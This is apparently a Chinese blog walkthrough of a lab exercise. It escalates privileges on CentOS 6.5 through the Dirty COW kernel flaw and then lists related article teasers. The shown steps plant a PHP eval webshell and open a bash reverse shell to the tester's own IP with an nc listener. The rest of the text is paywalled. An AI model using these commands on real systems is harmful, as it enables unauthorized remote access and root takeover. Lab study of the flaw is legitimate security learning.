Linux利用脏牛漏洞提权

最新推荐文章于 2024-07-09 18:01:17 发布
最新推荐文章于 2024-07-09 18:01:17 发布
阅读量5.8k 收藏 21
点赞数 5
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104783544
版权
本文介绍了在Centos6.5环境下,通过搭建实验环境,利用脏牛漏洞进行提权的详细步骤。包括安装http和php,启动http服务,关闭selinux,放置一句话木马,通过中国菜刀连接,获取交互式shell,查找并利用脏牛漏洞创建新用户并赋予root权限,最后通过修改sudoers文件实现提权。
摘要由CSDN通过智能技术生成

实验环境:Centos6.5、ssh

实验步骤:

一、搭建实验环境

1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd php

2.启动http,进入etc/init.d目录,输入:./httpd start

3.关掉selinux,输入:setenforce 0

4.在var/www/html目录下写一个一句话木马文件,内容为:<?php @eval($_REQUEST[666]);?>

二、进行提权

1.利用中国菜刀连接Centos,打开虚拟终端

2.获取交互式shell,输入:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,并在cmd中利用nc开启监听的端口号,交互成功

3.利用uname -a命令查看系统的内核系统

最低0.47元/天 解锁文章
没有如果ru果
关注
专栏目录
漏洞复现】CVE-2016-5195 DirtyCow 脏牛提权
做自己喜欢的事,并将其发挥到极致!
03-10 8145
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
linux利用脏牛提权
a1262443306的博客
04-18 1241
Linux利用脏牛漏洞提权: 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow) ​ 本主机:kali ip: 192.168.223.129 ​ 目标机:ubuntu ip:192.168.223.128 ​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接 打开虚拟终端: 2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
Linux脏牛漏洞提权
weixin_46626159的博客
03-27 6465
Linux脏牛漏洞提权
最详细Linux提权总结(建议收藏)
最新发布
jennycisp的博客
07-09 1098
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2.命令执行者要对该程序文件拥有执行(x)权限.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效。
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 3759
对CVE-2016-5159提权的保姆级的教程
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1075
vulnhub-靶场--lampiao
Linux脏牛提权-->CVE-2016-5195
weixin_63124284的博客
12-15 430
linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用漏洞来获取高权限,对只读内存映射进行访问。 并且在提权的时候,杀毒软件并不会检测到。
脏牛提权(靶机复现)
tubug的博客
03-26 2727
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
xss、脏牛提权.zip
06-18
包含xss注入闯关小游戏和脏牛提权exp等干货
linux提权脏牛CVE-2016-5195-
aaaaaadvszv的博客
06-05 172
lutil:链接 libutil 库。这对于使用多线程的程序是必要的。1.利用nmap查看你217网段下的开放端口,发现217.147开放80端口。-pedantic:更严格地遵循标准,发现一些非标准的用法。-std=c++11:使用 C++11 标准进行编译。g++:GNU 编译器集合中的 C++ 编译器。-odcow:指定输出文件的名称为 dcow。-O2:启用优化级别 2,进行中级优化。6.赋予执行权限,执行脚本进行漏洞检测。-Wall:启用所有常见的警告信息。dcow.cpp:源代码文件的名称。
Linux提权脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1676
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
脏牛提权
weixin_30782293的博客
04-15 606
转载自:https://www.0dayhack.com/post-691.html EXP1:dirtycow (PS:lhq123321是密码,如果提权成功自动生成一个firefart的管理员权限账号) 转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/8848062.html...
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 3364
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞
Linux提权脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
Lampiao 脏牛提权(CVE-2016-5195)
m0_64118193的博客
08-30 836
漏洞编号漏洞名称:脏牛提权漏洞危害:低权限用户利用漏洞技术可以在全版本Linux系统上实现本地提权,获取root权限影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复链接:靶场下载地址,提取码链接:提权文件下载地址,提权码zp3j。...
vulnhub--lampiao(脏牛提权
鲨鱼辣椒的博客
08-03 4781
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Linux提权技术:脏牛内核漏洞与SUID实战
案例4中提到了利用脏牛漏洞进行提权的过程,通常包括发现漏洞、下载或上传exploit代码、编译并执行。利用这个漏洞,攻击者可以在没有足够权限的情况下执行高权限操作。 4. **内核漏洞提权**: 内核漏洞提权是通过...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值